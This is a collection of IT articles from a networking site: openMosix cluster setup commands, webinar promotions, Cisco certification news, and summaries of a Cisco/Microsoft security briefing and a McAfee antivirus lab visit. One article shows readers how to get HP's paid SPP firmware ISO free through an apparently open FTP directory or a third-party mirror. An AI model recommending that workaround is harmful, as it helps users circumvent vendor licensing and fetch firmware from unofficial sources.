Untar them and create the links:

tar vxjf kernel-source-2.4.24.tar.bz2

ln -s /usr/src/kernel-source-2.4.24 /usr/src/linux

Apply the patch:

cd /usr/src/linux

../kernel-patches/i386/apply/openmosix

Install the kernel:

make menuconfig

make-kpkg kernel_image modules_image

cd ..

dpkg -i kernel-image-*-openmosix-*.deb

After this you can use 'apt-get' to install the openmosixview GUI utility for managing your cluster using the following command:

apt-get install openmosixview

Assuming you've successfully installed ClusterKnoppix, your ready to start using it - which also happens to be the topic of the next section:  Using ClusterKnoppix

  • Hits: 25392

OpenMosix - Part 1: Understanding openMosix

As we said before, openMosix is a single system image clustering extension for the Linux kernel. It has its roots in the extremely popular MOSIX clustering project, the main difference being that it is distributed under the GNU General Public License.

It allows a cluster of computers to behave like one big multi-processor computer. For example, if you run 2 processes on a single machine, each process will only get 50% of the CPU time. However, if you run both these processes over a 2 node cluster, each process will get 100% CPU time since there are two processors available. In essence, this behavior is very similar to SMP (Symmetric Multi-Processor) systems.

Diving Deeper

What openMosix does is balance the processing load over the systems in the cluster, taking into account the speed of the systems and the load they already have. Note however, that it does not parallelize the processing. Each individual process only runs on one computer at a time.

To quote the openMosix website example :

'If your computer could convert a WAV to a MP3 in a minute, then buying another nine computers and joining them in a ten-node openMosix cluster would NOT let you convert a WAV in six seconds. However, what it would allow you to do is convert 10 WAVs simultaneously. Each one would take a minute, but since you can do lots in parallel you'd get through your CD collection much faster.'

This simultaneous processing has a lot of uses, as there are many tasks that adapt extremely well to being used on a cluster. In the later sections, we'll show you some practical and fun uses for an openMosix based GNU/Linux cluster. Next: Building An openMosix Cluster

 

  • Hits: 15811

FREE WEBINAR: Microsoft Azure Certifications Explained - A Deep Dive for IT Professionals in 2020

It’s common knowledge, or at least should be, that certifications are the most effective way for IT professionals to climb the career ladder and it’s only getting more important in an increasingly competitive professional marketplace. Similarly, cloud-based technologies are experiencing unparalleled growth and the demand for IT professionals with qualifications in this sector are growing rapidly. Make 2020 your breakthrough year - check out this free upcoming FREE webinar hosted by two Microsoft cloud experts to plan your Azure certification strategy in 2020

microsoft azure certifications explained

The webinar features a full analysis of the Microsoft Azure certification landscape in 2020, giving you the knowledge to properly prepare for a future working with cloud-based workloads. Seasoned veterans Microsoft MVP Andy Syrewicze and Microsoft cloud expert Michael Bender will be hosting the event which includes Azure certification tracks, training and examination costs, learning materials, resources and labs for self-study, how to gain access to FREE Azure resources, and more. 

Altaro’s webinars are always well attended and one reason for this is the encouragement for attendee participation. Every single question asked is answered and no stone is left unturned by the presenters. They also present the event live twice to allow as many people as possible to have the chance of attending the event and asking their questions in person! 

For IT professionals in 2020, and especially those with a Microsoft ecosystem focus, this event is a must-attend! 

The webinar will be held on Wednesday February 19, at 3pm CET/6am PST/9am EST and at again 7pm CET/10am PST/1pm EST. I’ll be attending so I’ll see you there!

While the event date has passed, it has been recorded and is available for viewing. All material are available as direct downloads. Click here to access the event.

  • Hits: 3332

Free Webinar: Azure Security Center: How to Protect Your Datacenter with Next Generation Security

azure security center webinarSecurity is a major concern for IT admins and if you’re responsible for important workloads hosted in Azure, you need to know your security is as tight as possible. In this free webinar, presented by Thomas Maurer, Senior Cloud Advocate on the Microsoft Azure Engineering Team, and Microsoft MVP Andy Syrewicze, you will learn how to use Azure Security Center to ensure your cloud environment is fully protected.

There are certain topics in the IT administration world which are optional but security is not one of them. Ensuring your security knowledge is ahead of the curve is an absolute necessity and becoming increasingly important as we are all becoming exposed to more and more online threats every day. If you are responsible for important workloads hosted in Azure, this webinar is a must!

The webinar covers:

  • Azure Security Center introductions
  • Deployment and first steps
  • Best practices
  • Integration with other tools
  • And much more!

Being an Altaro-hosted webinar, expect this webinar to be packed full of actionable information presented via live demos so you can see the theory put into practice before your eyes. Also, Altaro put a heavy emphasis on interactivity, encouraging questions from attendees and using engaging polls to get instant feedback on the session. To ensure as many people as possible have this opportunity, Altaro present the webinar live twice so pick the best time for you and don’t be afraid to ask as many questions as you like!

Webinar: Azure Security Center: How to Protect Your Datacenter with Next Generation Security
Date: Tuesday, 30th July
Time: Webinar presented live twice on the day. Choose your preferred time:

  • 2pm CEST / 5am PDT / 8am EDT
  • 7pm CEST / 10am PDT / 1pm EDT

 While the event date has passed, it has been recorded and is available for viewing. All material are available as direct downloads. Click here to access the event.

azure security center webinar

  • Hits: 7743

Major Cisco Certification Changes - New Cisco CCNA, CCNP Enterprise, Specialist, DevNet and more from Feb. 2020

new cisco certification paths Feb 2020Cisco announced a major update to their CCNA, CCNP and CCIE certification program at Cisco Live last week, with the changes happening on the 24th  February 2020.

CCNA & CCENT Certification

The 10 current CCNA tracks (CCNA Routing and Switching, CCNA Cloud, CCNA Collaboration, CCNA Cyber Ops, CCNA Data Center, CCNA Industrial, CCNA Security, CCNA Service Provider, CCNA Wireless and CCNA Design) are being retired and replaced with a single ‘CCNA’ certification. The new CCNA exam combines most of the information on the current CCNA Routing and Switching with additional wireless, security and network automation content.

A new Cisco Certified DevNet Associate certification is also being released to satisfy the increasing demand in this area.

The current CCENT certification is being retired. There hasn’t been an official announcement from Cisco yet but rumours are saying that we might be seeing new ‘Foundations’ certifications which will focus on content from the retiring CCNA tracks.

CCNP Certification

Different technology tracks remain at the CCNP level. CCNP Routing and Switching, CCNP Design and CCNP Wireless are being consolidated into the new CCNP Enterprise, and CCNP Cloud is being retired. A new Cisco Certified DevNet Professional certification is also being released.

Only two exams will be required to achieve each CCNP certification – a Core and a Concentration exam. Being CCNA certified will no longer be a prerequisite for the CCNP certification.

If you pass any CCNP level exams before February 24 2020, you’ll receive badging for corresponding new exams and credit toward the new CCNP certification.

new cisco certification roadmap 2020

Click to Enlarge

CCIE Certification

The format of the CCIE remains largely the same, with a written and lab exam required to achieve the certification. The CCNP Core exam will be used as the CCIE Written exam though, there will no longer be a separate written exam at the CCIE level. Automation and Network Programmability are being added to the exams for every track.

All certifications will be valid for 3 years under the new program so you will no longer need to recertify CCIE every 2 years.

How the Changes Affect You

If you’re currently studying for any Cisco certification the advice from Cisco is to keep going. If you pass before the cutover your certification will remain valid for 3 years from the date you certify. If you pass some but not all CCNP level exams before the change you can receive credit towards the new certifications.

We've added a few resources to which you can turn to an obtain additional information:

The Flackbox blog has a comprehensive video and text post covering all the changes.

The official Cisco certification page is here.

  • Hits: 26677

Free Azure IaaS Webinar with Microsoft Azure Engineering Team

free azure iaas webinar with microsoft azure engineering teamImplementing Infrastructure as a Service (IaaS) is a great way of streamlining and optimizing your IT environment by utilizing virtualized resources from the cloud to complement your existing on-site infrastructure. It enables a flexible combination of the traditional on-premises data center alongside the benefits of cloud-based subscription services. If you’re not making use of this model, there’s no better opportunity to learn what it can do for you than in the upcoming webinar from Altaro: How to Supercharge your Infrastructure with Azure IaaS.

The webinar will be presented by Thomas Maurer, who has recently been appointed Senior Cloud Advocate, on the Microsoft Azure Engineering Team alongside Altaro Technical Evangelist and Microsoft MVP Andy Syrewicze.

The webinar will be primarily focused on showing how Azure IaaS solves real use cases by going through the scenarios live on air. Three use cases have been outlined already, however, the webinar format encourages those attending to suggest their own use cases when signing up and the two most popular suggestions will be added to the list for Thomas and Andy to tackle. To submit your own use case request, simply fill out the suggestion box in the sign up form when you register!

Once again, this webinar is going to presented live twice on the day (Wednesday 13th February). So if you can’t make the earlier session (2pm CET / 8am EST / 5am PST), just sign up for the later one instead (7pm CET / 1pm EST / 10am PST) - or vice versa. Both sessions cover the same content but having two live sessions gives more people the opportunity to ask their questions live on air and get instant feedback from these Microsoft experts.

Save your seat for the webinar!

Free IaaS Webinar with Microsoft Azune Engineering Team

While the event date has passed, it has been recorded and is available for viewing. All material are available as direct downloads. Click here to access the event.

  • Hits: 5097

Altaro VM Backup v8 (VMware & Hyper-V) with WAN-Optimized Replication dramatically reduces Recovery Time Objective (RTO)

Altaro, a global leader in virtual machine data protection and recovery, has introduced WAN-Optimized Replication in its latest version, v8, allowing businesses to be back up and running in minimal time should disaster strike. Replication permits a business to make an ongoing copy of its virtual machines (VMs) and to access that copy with immediacy should anything go wrong with the live VMs. This dramatically reduces the recovery time objective (RTO).

VMware and Hyper-V Backup

Optimized for WANs, Altaro's WAN-Optimized Replication enables system administrators to replicate ongoing changes to their virtual machines (VMs) to a remote site and to seamlessly continue working from the replicated VMs should something go wrong with the live VMs, such as damage due to severe weather conditions, flooding, ransomware, viruses, server crashes and so on.

Drastically Reducing RTO

"WAN-Optimized Replication allows businesses to continue accessing and working in the case of damage to their on-premise servers. If their office building is hit by a hurricane and experiences flooding, for instance, they can continue working from their VMs that have been replicated to an offsite location," explained David Vella, CEO and co-founder of Altaro Software.

"As these are continually updated with changes, businesses using Altaro VM Backup can continue working without a glitch, with minimal to no data loss, and with an excellent recovery time objective, or RTO."

Click here to download your free copy now of Altaro VMware Backupfree copyClick here to download your free copy now of Altaro VMware Backup

Centralised, Multi-tenant View For MSPs

Managed Service Providers (MSPs) can now add replication services to their offering, with the ability to replicate customer data to the MSP's infrastructure. This way, if a customer site goes down, that customer can immediately access its VMs through the MSP's infrastructure and continue working.

With Altaro VM Backup for MSPs, MSPs can manage their customer accounts through a multi-tenant online console for greater ease, speed and efficiency, enabling them to provide their customers with a better, faster service.

How To Upgrade

WAN-Optimized Replication is currently available exclusively for customers who have the Unlimited Plus edition of Altaro VM Backup. It is automatically included in Altaro VM Backup for MSPs.

Upgrading to Altaro VM Backup v8 is free for Unlimited Plus customers who have a valid Software Maintenance Agreement (SMA). The latest build can be downloaded from this page. If customers are not under active SMA, they should contact their Altaro Partner for information about how to upgrade.

New users can benefit from a fully-functional 30-day trial of Altaro VM Backup Unlimited Plus.

  • Hits: 5803

Free Live Demo Webinar: Windows Server 2019 in Action

windows server 2019 webinarSo you’ve heard all about Windows Server 2019 - now you can see it in action in a live demo webinar on November 8th! The last WS2019 webinar by Altaro was hugely popular with over 4,500 IT pros registering for the event. Feedback from gathered with that webinar and the most popular features will now be tested live by Microsoft MVP Andy Syrewicze. And you’re invited!

This deep-dive webinar will focus on:

  • Windows Admin Center
  • Containers on Windows Server
  • Storage Migration Service
  • Windows Subsystem for Linux
  • And more!

Demo webinars are a really great way to see a product in action before you decide to take the plunge yourself. It enables you to see the strengths and weaknesses first-hand and also ask questions that might relate specifically to your own environment. With the demand so high, the webinar is presented live twice on November 8th to help as many people benefit as possible.

altaro windows server 2019 in action webinar

The first session is at 2pm CET/8am EST/5am PST and the second is at 7pm CET/1pm EST/10am PST. With the record number of attendees for the last webinar, some people were unable to attend the sessions which were maxed out. It is advised you save your seat early for this webinar to keep informed and ensure you don’t miss the live event.

Save your seat: https://goo.gl/2RKrSe

While the event date has passed, it has been recorded and is available for viewing. All material are available as direct downloads. Click here to access the event.  

  • Hits: 5967

Windows Server 2019 Free Webinar

With Microsoft Ignite just around the corner, Windows Server 2019 is set to get its full release and the signs look good. Very good. Unless you’re part of the Windows Server insider program - which grants you access to the latest Windows Server Preview builds - you probably haven’t had a hands-on experience yet with Windows Server 2019 but the guys over at Altaro have and are preparing to host a webinar on the 3rd of October to tell you all about it.

altaro windows server 2019 webinar

The webinar will be held a week after Microsoft Ignite so it will cover the complete feature set included in the full release as well as a more in-depth look at the most important features in Windows Server 2019. Whenever a new version of Windows Server gets released there’s always a lot of attention and media coverage so it’s nice to have an hour long session where you can sit back and let a panel of Microsoft experts cut through the noise and give you all the information you need.

It’s also a great chance to ask your questions direct to those with the inside knowledge and receive answers live on air. Over 2000 people have now registered for this webinar and we’re going to be joining too. It’s free to register - what are you waiting for?

Save your seat: https://goo.gl/V9tYYb

Note: While this event has passed, its still available to view and download all related/presented material. Click on the above link to access the event recording.

  • Hits: 4865

Download HP Service Pack (SPP) for ProLiant Servers for Free (Firmware & Drivers .ISO)– Directly from HP!

hp-service-pack-for-proliant-spp-free-download-1aDownloading all necessary drivers and firmware upgrades for your HP Proliant server is very important, especially if hardware compatibility is critical for new operating system installations or virtualized environments (VMwareHyperV). Til recently, HP customers could download the HP Service Pack (SPP) for Proliant servers free of charge, but that’s no longer the story as HP is forcing customers to pay up in order to get access to its popular SPP package.

For those who are unaware, the HP SPP is a single ISO image that contains all the latest firmware software and drivers for HP’s Proliant servers, supporting older and newer operating systems including Virtualization platforms such as VMware and HyperV.

From HP’s prospective, you can either search and download for free each individual driver you think is needed for your server, or you buy a support contract and get everything in one neat ISO with all the necessary additional tools to make life easy – sounds attractive right? Well, it depends which way you look at it… not everyone is happy to pay for firmware and driver updates considering they are usually provided free of charge.

A quick search for HP Proliant firmware or drivers on any search engine will bring up HP’s Enterprise Support Center where the impression is given that we are one step away from downloading our much wanted SPP:

HP Proliant SPP Driver and Firmware Free Download

Figure 1. Attempting to download the HP Service Pack for ProLiant (SPP) ISO

When clicking on the ‘Obtain Software’ link, users receive the bad news:

hp-service-pack-for-proliant-spp-free-download-2

Figure 2. Sorry, you need to pay up to download the HP Service Pack ISO image!

Well, this is not the case – at least for now.

Apparently HP has set up this new policy to ensure customers pay for their server driver upgrades, however, they’ve forgotten (thankfully) one very important detail – securing the location of the HP Service Pack for ProLiant (SPP) ISO :)

To directly access the latest version of HP’s SPP ISO image simply click on the following URL or copy-paste it to your web browser:

ftp://ftp.hp.com/pub/softlib2/software1/cd-generic/p67859018/v113584/

HP’s FTP server is apparently wide-open allowing anonymous users to access and download not only the latest SPP ISO image, but pretty much browse the whole SPP repository and download any SSP version they want:

The latest (free) HP SPP ISO is just a click away!

Figure 3. The latest (free) HP SPP ISO is just a click away!

Simply click the “Up to higher level directory” link to move up and get access to all other versions of the SPP repository!

It’s great to see HP real cares about its customers and allows them to freely download the HP Service Pack (SPP) for Proliant servers. It’s not every day you get a vendor being so generous to its customers so if you’ve got a HP Proliant server, make sure you update its drivers and firmware while you still can!

Note: The above URL might not still be active - in this case you can download it from here:

https://www.systrade.de/download/SPP/

  • Hits: 296567

Colasoft Announces Release of Capsa Network Analyzer v8.2

colasoft-category-logoFebruary 23, 2016 – Colasoft LLC, a leading provider of innovative and affordable network analysis solutions, today announced the availability of Colasoft Capsa Network Analyzer v8.2, a real-time portable network analyzer for wired and wireless network monitoring, bandwidth analysis, and intrusion detection. The data flow display and protocols recognition are optimized in Capsa Network Analyzer 8.2.

Capsa v8.2 is capable of analyzing the traffic of wireless AP with 2 channels. Users can choose up to 2 wireless channels to analyze the total traffic which greatly enhances the accuracy of wireless traffic analysis. Hex display of decoded data is added in Data Flow sub-view in TCP/UDP Conversation view. Users can switch the display format between hex and text in Capsa v8.2.

Besides the optimizations of Data Flow sub-view in TCP/UDP Conversation view, with the continuous improvement of CSTRE (Colasoft Traffic Recognition Engine), Capsa 8.2 is capable of recognizing up to 1546 protocols and sub-protocols, which covers most of the mainstream protocols.colasoft-network-analyzer-v82

“We have also enhanced the interface of Capsa which improves user experience”, said Brian K. Smith, Vice President at Colasoft LLC, “the release of Capsa v8.2 provides a more comprehensive network analyze result to our customers.”

  • Hits: 8663

Safety in Numbers - Cisco & Microsoft

By Campbell Taylor

Recently I attended a presentation by Lynx Technology in London . The presentation was about the complimentary use of Cisco and Microsoft technology for network security. The title of the presentation was “End-to-end SecurityBriefing” and it set out to show the need for security within the network as well as at the perimeter. This document is an overview of that presentation but focuses on some key areas rather than covering the entire presentation verbatim. The slides for the original presentation can be found at http://www.lynxtec.com/presentations/.

The presentation opened with a discussion about firewalls and recommended a dual firewall arrangement as being the most effective in many situations. Their dual firewall recommendation was a hardware firewall at the closest point to the Internet. For this they recommended Cisco's PIX firewall. The recommendation for the second firewall was an application firewall. such as Microsoft's Internet Security and Acceleration server (ISA) 2004 or Checkpoint's NG products.

The key point made here is that the hardware firewall will typically filter traffic from OSI levels 1 – 4 thus easing the workload on the 2nd firewall which will filter OSI levels 1 – 7.

To elaborate, the first firewall can check that packets are of the right type but cannot look at the payload that may be malicious, malformed HTTP requests, viruses, restricted content etc.

This level of inspection is possible with ISA.

articles-members-contributions-sincm-1Figure 1. Dual firewall configuration
Provides improved performance and filtering for traffic from OSI levels 1 – 7.

 You may also wish to consider terminating any VPN traffic at the firewall so that the traffic can be inspected prior to being passed through to the LAN. End to end encryption is creating security issues, as some firewalls are not able to inspect the encrypted traffic. This provides a tunnel for malicious users through the network firewall.

Content attacks were seen as an area of vulnerability, which highlights the need to scan the payload of packets. The presentation particularly made mention of attacks via SMTP and Outlook Web Access (OWA)

Network vendors are moving towards providing a security checklist that is applied when a machine connects to the network. Cisco's version is called Network Access Control (NAC) and Microsoft's is called Network Access Quarantine Control (NAQC) although another technology called Network Access Protection (NAP) is to be implemented in the future.

Previously NAP was to be a part of Server 2003 R2 (R2 due for release end of 2005). Microsoft and Cisco have agreed to develop their network access technologies in a complementary fashion so that they will integrate. Therefore clients connecting to the Cisco network will be checked for appropriate access policies based on Microsoft's Active Directory and Group Policy configuration.

The following is taken directly from the Microsoft website: http://www.microsoft.com/windowsserver2003/techinfo/overview/quarantine.mspx

Note: Network Access Quarantine Control is not the same as Network Access Protection, which is a new policy enforcement platform that is being considered for inclusion in Windows Server "Longhorn," the next version of the Windows Server operating system.

Network Access Quarantine Control only provides added protection for remote access connections. Network Access Protection provides added protection for virtual private network (VPN) connections, Dynamic Host Configuration Protocol (DHCP) configuration, and Internet Protocol security (IPsec)-based communication.

 ISA Server & Cisco Technologies

ISA 2004 sits in front of the server OS that hosts the application firewall and filters traffic as it enters the server from the NIC. Therefore intercepting it before it is passed up OSI levels.

This means that ISA can still offer a secure external facing application firewall even when the underlying OS may be unpatched and vulnerable. Lynx advised that ISA 2000 with a throughput of 282 Mbps beat the next closest rival that was Checkpoint. ISA 2004 offers an even higher throughput of 1.59 Gbps (Network Computing Magazine March 2003)

articles-members-contributions-sincm-2

 

Cisco's NAC can be used to manage user nodes (desktops and laptops) connecting to your LAN. A part of Cisco's NAC is the Cisco Trust Agent which is a component that runs on the user node and talks to the AV server and RADIUS server. NAC targets the “branch office connecting to head office” scenario and supports AV vendor products from McAfee, Symantec and Trend. Phase 2 of Cisco's NAC will provide compliance checking and enforcement with Microsoft patching.

ISA can be utilized in these scenarios with any new connections being moved to a stub network. Checks are then run to make sure the user node meets the corporate requirements for AV, patching, authorisation etc. Compliance is enforced by NAC and NAQC/NAP. Once a connecting user node passes this security audit and any remedial actions are completed the user node is moved from the stub network into the LAN proper.

Moving inside the private network, the “Defence in depth” mantra was reiterated. A key point was to break up a flat network. For example clients should have little need to talk directly to each other, instead it should be more of a star topology with the servers in the centre and clients talking to the servers. This is where Virtual Local Area Networks (VLANs) would be suitable and this type of configuration makes it more difficult for network worms to spread.

Patch Management, Wireless & Security Tools

Patch Management

Patch management will ensure that known Microsoft vulnerabilities can be addressed (generally) by applying the relevant hot fix or service pack. Although not much detail was given Hot Fox Network Checker (Hfnetchk) was highlighted as an appropriate tool along with Microsoft Baseline Security Analyser (MBSA).

Restrict Software

Active Directory is also a key tool for administrators that manage user nodes running WXP and Windows 2000. With Group Policies for Active Directory you can prevent specified software from running on a Windows XP user node.

To do this use the “Software Restriction Policy”. You can then blacklist specific software based on any of the following:

  • A hash value of the software
  • A digital certificate for the software
  • The path for to the executable
  • Internet Zone rules

File, Folder and Share access

On the server all user access to files, folders and shares should be locked down via NTFS (requires Windows NT or higher). Use the concept of minimal necessary privilege.

User Node Connectivity

The firewall in Service Pack 2 for Windows XP (released 25 August 2004) can be used to limit what ports are open to incoming connections on the Windows XP user node.

Wireless

As wireless becomes more widely deployed and integrated more deeply in day-to-day operations we need to manage security and reliability. It is estimated Lynx that wireless installations can provide up to a 40% reduction in installation costs over standard fixed line installations. But wireless and the ubiquity of the web means that the network perimeter is now on the user node's desktop.

NAC and NAP, introduced earlier, will work with Extensible Authentication Protocol-Transport Level Security (EAP-TLS). EAP-TLS is used as a wireless authentication protocol. This means the wireless user node can still be managed for patching, AV and security compliance on the same basis as fixed line (e.g. Ethernet) connected user nodes.

EAP-TLS is scalable but requires Windows 2000 and Active Directory with Group Policy. To encrypt wireless traffic, 802.1x is recommended and if you wanted to investigate single sign on for your users across the domain then you could look at Public Key Infrastructure (PKI).

As part of your network and security auditing you will want to check the wireless aspect and the netstumbler tool will run on a wireless client and report on any wireless networks that have sufficient strength to be picked up.

As a part of your physical security for wireless networking you should consider placing Wireless Access Points (WAPs) in locations that provide restricted user access, for example in the ceiling cavity. Of course you will need to ensure that ypu achieve the right balance of physical security and usability, making sure that the signal is still strong enough to be used.

Layer 8 of the OSI model

The user was jokingly referred to as being the eighth layer in the OSI model and it is here that social engineering and other non-technical reconnaissance and attack methods can be attempted. Kevin Mitnick has written “The Art Of Deception: Controlling The Human Element Of Security” which is highly regarded in the IT security environment.

One counter measure to employ for social engineering is ensuring that all physical material is disposed of securely. This includes internal phone lists, hard copy documents, software user manuals etc. User education is one of the most important actions so you could consider user friendly training with workshops and reminders (posters, email memo's, briefings) to create a security conscious work place.

Free Microsoft Security Tools

MBSA, mentioned earlier, helps audit the security configuration of a user/server node. Other free Microsoft tools are the Exchange Best Practice Analyser, SQL Best Practice Analyser and the Microsoft Audit Collection System.

For conducting event log analysis you could use the Windows Server 2003 Resource Kit tool called EventcombMT. User education can be enhanced with visual reminders like a login message or posters promoting password security.

For developing operational guidelines the IT Infrastructure Library (ITIL) provides a comprehensive and customisable solution. ITIL was developed by the UK government and is now used internationally. Microsoft's own framework, Microsoft Operations Framework draws from ITIL. There is also assistance in designing and maintaining a secure network provided free by Microsoft called “Security Operations Guide”

Summary

Overall then, the aim is to provide layers of defence. For this you could use a Cisco PIX as your hardware firewall (first firewall) with a Microsoft ISA 2004 as your application layer firewall (second firewall). You may also use additional ISA 2004's for internal firewalls to screen branch to Head Office traffic.

The user node will authenticate to the domain. Cisco NAC and Microsoft NAQC/NAP will provide a security audit, authentication and enforcement on these user nodes connecting to the LAN that gain authorisation. If any action is required to make the user node meet the specified corporate security policies this will be carried out by moving the user node to a restricted part of the network.

Once the user node is authenticated, authorised and compliant with the corporate security policy then it will be allowed to connect to its full, allowed rights as part of the Private network. If using wireless the EAP-TLS may be used for the authentication and 802.1x for the encryption of the wireless traffic.

To help strengthen the LAN if the outer perimeter is defeated you need to look at segmenting the network. This will help minimise or delay malicious and undesirable activity from spreading throughout your private network. VLANs will assist with creating workgroups based on job function, allowing you to restrict the scope of network access a user may have.

For example rather than any user being able to browse to the Payroll server you can use VLANs to restrict access to that server to only the HR department. Routers can help to minimise the spread of network worms and undesirable traffic by introducing Access Control Lists (ACLs).

To minimise the chance of “island hopping” where a compromised machine is used to target another machine, you should ensure that the OS of all clients and Servers are hardened as much as possible – remove unnecessary services, patch, remove default admin shares if not used and enforce complex passwords.

Also stop clients from having easy access to another client machine unless it is necessary. Instead build more secure client to server access. The server will typically have better security because it is part of a smaller group of machines, thus more manageable and its is also a more high profile machine.

Applications should be patched and counter measures put in place for known vulnerabilities. This includes Microsoft Exchange, SQL and IIS, which are high on a malicious hackers attack list. The data on the servers can then be secured using NTFS permissions to only permit those who are authorised to access the data in the manner you specify.

Overall the presentation showed me that a more integrated approach was being taken by vendors to Network security. Interoperability is going to be important to ensure the longevity of your solution but it is refreshing to see two large players in the IT industry like Cisco and Microsoft working together.

  • Hits: 37873

A Day In The Antivirus World

This article written by Campbell Taylor - 'Global', is a review of the information learnt from a one day visit to McAfee and includes personal observations or further information that he felt were useful to the overall article. He refers to malicious activity as a term to cover the range of activity that includes worms, viruses, backdoors, Trojans, and exploits. Italics indicate a personal observation or comment.

In December 2004 I was invited to a one day workshop at McAfee's offices and AVERT lab at Aylesbury in England . As you are probably aware McAfee is an anti-virus (AV) vendor and AVERT ( Anti-Virus Emergency Response Team) is McAfee's AV research lab.

This visit is the basis for the information in this document and is split into 4 parts:

1) THREAT TRENDS

2) SECURITY TRENDS

3) SOME OF TODAY'S SECURITY RESPONSES

4) AVERT LAB VISIT

Threat Trends

Infection by Browsing

Browsing looks set to become a bigger method of infection by a virus in the near future but there was also concern about the potential for a ‘media independent propagation by a virus', that I found very interesting.

 

Media Independent propagation

By media independent I mean that the virus is not constrained to travelling over any specific media like Ethernet or via other physical infrastructure installations. McAfee's research showed a security risk with wireless network deployment which is discussed in the Security Trends section of this document.

So what happens if a virus or worm were able to infect a desktop via any common method and that desktop was part of a wired and wireless network? Instead of just searching the fixed wire LAN for targets, the virus/worm looks for wireless networks that are of sufficient strength to allow it to jump into that network.

You can draw up any number of implications from this but my personal observation is that this means you have to consider the wireless attack vector as seriously as the fixed wire attack vector. This reinforces the concept that the network perimeter is no longer based on the Internet/Corporate LAN perimeter and instead it now sits wherever interaction between the host machine and foreign material exists. This could be the USB memory key from home, files accessed on a compromised server or the web browser accessing a website.

An interesting observation from the McAfee researcher was that this would mean a virus/worm distribution starting to follow a more biological distribution. In other words you would see concentrations of the virus in metropolitan areas and along key meeting places like cyber cafes or hotspots.

Distributed Denial of Service (DDos)

DDoS attacks are seen as continuing threat because of the involvement of criminals in the malicious hacker/cracker world. Using DDoS for extortion provides criminals with a remote control method of raising capital.

Virus writers are starting to instruct their bot armies to coordinate their time keeping by accessing Internet based time servers. This means that all bots are using a consistent time reference. In turn this makes any DDos that much more effective than relying on independent sources of time reference.

As a personal note, Network administrators and IT security people might consider who needs access to Internet based Time servers. You may think about applying an access control list (ACL) that only permits NTP from one specified server in your network and denying all other NTP traffic. The objective is to reduce the chances of any of your machines being used as part of a bot army for DDos attacks.

Identity Theft

This was highlighted as a significant likely trend in the near future and is part of the increase in Phishing attacks that have been intercepted by MessageLabs.

SOCKS used in sophisticated identify theft

McAfee did not go into a lot of detail about this but they pointed out that SOCKS is being used by malicious hackers to bypass corporate firewalls because SOCKS is a proxy service. I don't know much about SOCKS so this is more of a heads up about technologies being used maliciously in the connected world.

Privacy versus security

One of the speakers raised the challenge of privacy versus security. Here the challenge is promoting the use of encrypted traffic to provide protection for data whilst in transit but then the encrypted traffic is more difficult to scan with AV products. In some UK government networks no encrypted traffic is allowed so that all traffic can be scanned.

In my opinion this is going to become more of an issue as consumers and corporates create a demand for the perceived security of HTTPS, for example.

Flexibility versus security

In the McAfee speaker's words this is about “ease of use versus ease of abuse”. If security makes IT too difficult to use effectively then end users will circumvent security.

Sticky notes with passwords on the monitor anyone?


Security Trends

Wireless Security

Research by McAfee showed that, on average, 60% of all wireless networks were deployed insecurely (many without even the use of WEP keys)

The research was conducted by war driving with a laptop running net stumbler in London and Reading (United Kingdom) and Amsterdam (Netherlands). The research also found that in many locations in major metropolitan areas there was often an overlap of several wireless networks of sufficient strength to attempt a connection.

AV product developments

AV companies are developing and distributing AV products for Personal Digital Assistants (PDAs) and smart phones. For example, F-secure, a Finnish AV firm, is providing AV software for Nokia (which, not surprisingly is based in Finland).

We were told that standard desktop AV products are limited to being reactive in many instances, as they cannot detect a virus until it is written to hard disk. Therefore in a Windows environment - Instant Messaging, Outlook Express and web surfing with Internet Explorer, the user is exposed, as web content is not necessarily written to hard disk.

This is where the concept of desktop firewalls or buffer overflow protection is important. McAfee's newest desktop product, VirusScan 8.0i, offers access protection that is designed to prevent undesired remote connections; it also offers buffer overflow protection. However it is also suggested that a firewall would be useful to stop network worms.

An interesting program that the speaker mentioned (obviously out of earshot of the sales department) was the Proxomitron. The way it was explained to me was that Proxomitron is a local web proxy. It means that web content is written to the hard disk and then the web browser retrieves the web content from the proxy. Because the web content has been written to hard disk your standard desktop AV product can scan for malicious content.

I should clarify at this point that core enterprise/server AV solutions like firewall/web filtering and email AV products are designed to scan in memory as well as the hard disk.

I guess it is to minimise the footprint and performance impact that the desktop AV doesn't scan memory. No doubt marketing is another factor – why kill off your corporate market when it generates substantial income?

AV vendors forming partnerships with Network infrastructure vendors

Daily AV definition file releases

McAfee is moving daily definition releases in an attempt to minimise the window of opportunity for infection.

Malicious activity naming

A consistent naming convention that is vendor independent is run by CVE (Common Vulnerabilities and Exposures). McAfee will be including the CVE reference to malicious activity that is ranked by McAfee as being of medium threat or higher.

Other vendors may use a different approach but I feel the use of a common reference method will help people in the IT industry to correlate information data about malicious activity form different sources rather than the often painful (for me at least) hunting exercise we engage in to get material from different vendors or sources about malicious activity.

AV products moving from reactive detection to proactive blocking of suspect behaviour

New AV products from McAfee (for example VirusScan 8.0i) are including suspect behaviour detection and blocking as well as virus signature detection. This acknowledges that virus detection by a virus signature is a reactive action. So by blocking suspicious behaviour you can prevent potential virus activity before a virus signature has been developed. For example port blocking can be used to stop a mydoom style virus from opening ports for backdoor access.

A personal observation is that Windows XP Service Pack 2 does offer a Firewall but this is a limited firewall as it provides port blocking only for traffic attempting to connect to the host. Therefore it would not stop a network worm searching for vulnerable targets.

Some of Today's Security Responses

Detecting potential malicious activity - Network

Understand your network's traffic patterns and develop a baseline of network traffic. If you see a significant unexpected change in your network traffic you may be seeing the symptoms of malicious activity.

Detecting potential malicious activity - Client workstation

On a Windows workstation if you run “ netstat –a ” from the command line you can see the ports that the workstation has open and to whom it's trying to connect. If you see ports open that are unexpected, especially ones outside of the well known range (1 – 1024) or connections to unexpected IP addresses, then further investigation may be worthwhile.

Tightening Corporate Email security

With the prevalence of mass mailing worms and viruses McAfee offered a couple of no/low cost steps that help to tighten your email security.

  1. Prevent all SMTP traffic in/outwards that is not for your SMTP server
  2. Prevent MX record look up
  3. Create a honeypot email address in your corporate email address book so that any mass mail infections will send an email to this honeypot account and alert you to the infection. It was suggested that the email account be inconspicuous e.g. not containing any admin, net, help, strings in the address. Something like '#_#@your domain' would probably work.

AVERT LAB VISIT

We were taken to the AVERT labs where we were shown the path from the submission of a suspected malicious sample through to the testing of the suspect sample and then to the development of the removal tools and definition files, their testing and deployment.

Samples are collected by submission via email, removable media via mail (e.g. CD or floppy disk) or captured via AVERT's honeypots in the wild.

